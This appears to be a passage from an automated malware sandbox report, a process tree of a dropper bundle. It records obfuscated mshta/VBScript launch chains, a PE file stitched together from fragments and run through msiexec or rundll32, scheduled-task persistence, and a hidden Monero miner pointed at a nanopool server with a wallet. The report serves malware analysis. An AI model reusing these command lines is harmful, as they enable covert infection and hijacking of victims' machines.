                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIPt: ClOsE ( CreatEObJEct ( "WsCrIPT.SheLL" ).rUn ( "CMD.eXe /R CoPY /y ""C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe"" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if """" =="""" for %r IN (""C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe"" ) do taskkill -F -im ""%~nXr"" " , 0 , TRue ) )
                                                                                                  6⤵
                                                                                                    PID:2952
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /R CoPY /y "C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if "" =="" for %r IN ("C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe" ) do taskkill -F -im "%~nXr"
                                                                                                      7⤵
                                                                                                        PID:3980
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe
                                                                                                          V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4188
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIPt: ClOsE ( CreatEObJEct ( "WsCrIPT.SheLL" ).rUn ( "CMD.eXe /R CoPY /y ""C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe"" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if ""-Pfj2~BykFzhrErek "" =="""" for %r IN (""C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe"" ) do taskkill -F -im ""%~nXr"" " , 0 , TRue ) )
                                                                                                            9⤵
                                                                                                              PID:4372
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /R CoPY /y "C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if "-Pfj2~BykFzhrErek " =="" for %r IN ("C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe" ) do taskkill -F -im "%~nXr"
                                                                                                                10⤵
                                                                                                                  PID:4688
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" VBscrIpt: CLoSE ( CReateObJect( "WsCriPT.shELL").RuN ( "C:\Windows\system32\cmd.exe /Q /c eCHo | SeT /P = ""MZ"" > ExEVJL.g & COPy /Y /B ExEVJL.G + U8U4.ZD + 2NJZD~L.hj +YG7HWLI_.4 CA~K8RAL.W & starT msiexec.exe /y .\CA~K8RAL.W & dEl U8U4.ZD 2NjZD~L.HJ YG7HWLI_.4 ExEVJL.G " , 0 ,True ) )
                                                                                                                9⤵
                                                                                                                  PID:4552
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /Q /c eCHo | SeT /P = "MZ" > ExEVJL.g & COPy /Y /B ExEVJL.G + U8U4.ZD + 2NJZD~L.hj +YG7HWLI_.4 CA~K8RAL.W & starT msiexec.exe /y .\CA~K8RAL.W & dEl U8U4.ZD 2NjZD~L.HJ YG7HWLI_.4 ExEVJL.G
                                                                                                                    10⤵
                                                                                                                      PID:3968
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                        11⤵
                                                                                                                          PID:1112
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>ExEVJL.g"
                                                                                                                          11⤵
                                                                                                                            PID:4172
                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            msiexec.exe /y .\CA~K8RAL.W
                                                                                                                            11⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2128
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill -F -im "Sat025fdceb8a76.exe"
                                                                                                                      8⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4656
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Sat02f9cd0f8f.exe
                                                                                                              4⤵
                                                                                                                PID:4048
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02f9cd0f8f.exe
                                                                                                                  Sat02f9cd0f8f.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1580
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Sat0264f0e3e2e3407e.exe
                                                                                                                4⤵
                                                                                                                  PID:1584
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Sat02ef0dfe9e5.exe
                                                                                                                  4⤵
                                                                                                                    PID:704
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c Sat02be63d703bf9.exe
                                                                                                                    4⤵
                                                                                                                      PID:324
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c Sat0292f4622e87ae.exe
                                                                                                                      4⤵
                                                                                                                        PID:4004
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c Sat02614aa7aa9e9d.exe
                                                                                                                        4⤵
                                                                                                                          PID:1352
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe
                                                                                                                    Sat02614aa7aa9e9d.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:3152
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                      2⤵
                                                                                                                        PID:8
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                          3⤵
                                                                                                                            PID:1264
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                              09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4200
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                5⤵
                                                                                                                                  PID:4460
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                    6⤵
                                                                                                                                      PID:4724
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                                    5⤵
                                                                                                                                      PID:4556
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                                        6⤵
                                                                                                                                          PID:3040
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                            7⤵
                                                                                                                                              PID:68
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                              7⤵
                                                                                                                                                PID:4616
                                                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                                                control .\R6f7sE.I
                                                                                                                                                7⤵
                                                                                                                                                  PID:1628
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                    8⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1404
                                                                                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                      9⤵
                                                                                                                                                        PID:6300
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                          10⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6356
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /F -Im "Sat02614aa7aa9e9d.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4668
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02ef0dfe9e5.exe
                                                                                                                                        Sat02ef0dfe9e5.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1252
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4416
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4808
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:4876
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1473224.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1473224.scr" /S
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3420
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4656
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5242243.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5242243.scr" /S
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:5100
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\3105439.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\3105439.scr" /S
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:4352
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5897258.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5897258.scr" /S
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:4832
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1159992.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1159992.scr" /S
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                              PID:1316
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8854645.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8854645.scr" /S
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4272
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4972
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 900
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              • Program crash
                                                                                                                                              PID:3696
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                                                                            3⤵
                                                                                                                                              PID:5044
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4032
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3864
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-JANVT.tmp\setup.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-JANVT.tmp\setup.tmp" /SL5="$20350,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:4664
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4176
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KS80M.tmp\setup.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-KS80M.tmp\setup.tmp" /SL5="$30350,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4712
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-S6QIP.tmp\postback.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-S6QIP.tmp\postback.exe" ss1
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5056
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4424
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 664
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4636
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 696
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:1528
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 716
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2128
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 852
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4960
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 816
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4352
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1288
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4556
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1252
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:3184
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1236
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5224
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1328
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5692
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1348
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:6048
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4884
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4884 -s 1528
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4956
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5092
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4860
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                          5⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:6400
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:2160
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3080
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                              6⤵
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:4084
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4848
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                              5⤵
                                                                                                                                                                PID:7116
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02b7c3d3dc184.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02b7c3d3dc184.exe" /SILENT
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2164
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-RM3G7.tmp\Sat02b7c3d3dc184.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-RM3G7.tmp\Sat02b7c3d3dc184.tmp" /SL5="$7007C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02b7c3d3dc184.exe" /SILENT
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2392
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-Q8D01.tmp\postback.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-Q8D01.tmp\postback.exe" ss1
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4856
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat0264f0e3e2e3407e.exe
                                                                                                                                                          Sat0264f0e3e2e3407e.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          PID:3788
                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\4i2Qiqj6YF6K42J0BRuNDmuH.exe
                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\4i2Qiqj6YF6K42J0BRuNDmuH.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4124
                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\hxyntZSKlxOYl5OwRqIoIwyS.exe
                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\hxyntZSKlxOYl5OwRqIoIwyS.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:6008
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                              3⤵
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:6884
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                              3⤵
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:6876
                                                                                                                                                            • C:\Users\Admin\Documents\8JmWC6QfY8hdkELRprS2AEYS.exe
                                                                                                                                                              "C:\Users\Admin\Documents\8JmWC6QfY8hdkELRprS2AEYS.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:6868
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Y5XwXscIm_XtaaZo0GUcarzL.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Y5XwXscIm_XtaaZo0GUcarzL.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3152
                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\KdM8ocRyYY7DEAY9Eb7pBHe8.exe
                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\KdM8ocRyYY7DEAY9Eb7pBHe8.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:5044
                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\7W8dnEFaKljkfJGuqtYsTDUA.exe
                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\7W8dnEFaKljkfJGuqtYsTDUA.exe" /mixtwo
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4960
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ut2MOrud3zcaSq8JCdYykF9k.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ut2MOrud3zcaSq8JCdYykF9k.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5800
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\qpdHtcKUMXmD2vwxnIaad1BM.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\qpdHtcKUMXmD2vwxnIaad1BM.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                      PID:2252
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4444
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1068
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
